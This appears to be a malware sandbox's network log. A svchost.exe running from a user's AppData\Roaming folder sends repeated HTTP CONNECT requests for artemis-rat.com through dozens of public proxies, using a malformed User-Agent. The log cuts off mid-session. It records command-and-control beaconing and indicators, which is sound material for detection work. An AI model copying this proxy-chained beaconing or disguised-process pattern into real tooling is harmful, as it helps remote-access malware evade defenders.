Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3098	192.168.2.5	59456	161.97.170.209	62291	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.695127964 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.442656040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3099	192.168.2.5	58248	51.89.173.40	11058	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.695208073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.442682981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3100	192.168.2.5	58238	37.187.77.58	18936	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.719923973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3101	192.168.2.5	59975	199.188.93.214	9000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.723162889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3102	192.168.2.5	59504	138.36.150.16	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.723181009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3103	192.168.2.5	59965	123.241.210.123	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.738966942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.165153027 CET	326	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3104	192.168.2.5	58083	196.2.13.12	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.744282007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3105	192.168.2.5	59968	14.103.24.20	8000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.744389057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3106	192.168.2.5	59966	185.110.190.99	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.746773005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3107	192.168.2.5	59522	105.112.140.218	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.791543007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.880172968 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3108	192.168.2.5	58392	128.199.196.31	41672	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.795022011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.145828962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3109	192.168.2.5	59969	43.133.136.208	8800	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.795231104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3110	192.168.2.5	60031	43.134.230.122	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.795912981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3111	192.168.2.5	60038	43.134.230.122	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.796824932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3112	192.168.2.5	60040	43.134.230.122	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.797489882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3113	192.168.2.5	60041	43.134.230.122	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.798840046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3114	192.168.2.5	58354	5.44.42.115	58386	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.808485985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3115	192.168.2.5	59973	91.107.180.250	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.811223030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.119416952 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3116	192.168.2.5	59967	103.146.137.5	1081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.818572998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.658194065 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.974163055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.378463984 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3117	192.168.2.5	59977	43.128.146.42	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.840816021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3118	192.168.2.5	59674	143.110.232.177	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.852797031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.380367994 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.502085924 CET	805	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:36 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 613 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3119	192.168.2.5	58491	142.54.232.6	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.854381084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3120	192.168.2.5	59602	115.244.127.160	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.859889984 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3121	192.168.2.5	59699	64.227.108.182	14287	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.860100985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.880245924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3122	192.168.2.5	59978	82.137.244.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.892904043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3123	192.168.2.5	58171	111.206.0.99	8181	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.897577047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.937114000 CET	162	IN	HTTP/1.1 200 Connection Established Accept-Ranges: bytes Content-Length: 0 Date: Sat, 09 Mar 2024 12:14:34 GMT Server: eJet/1.4.2 X-Nat-IP: 154.16.105.38

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3124	192.168.2.5	60000	104.25.87.42	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.906469107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.060961962 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3125	192.168.2.5	60004	104.16.195.74	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.908251047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.062532902 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3126	192.168.2.5	60019	188.114.99.171	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.913336039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.068016052 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3127	192.168.2.5	59772	92.204.135.37	8623	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.919342995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.177608967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3128	192.168.2.5	59981	194.247.173.17	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.919855118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3129	192.168.2.5	59980	27.65.114.8	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
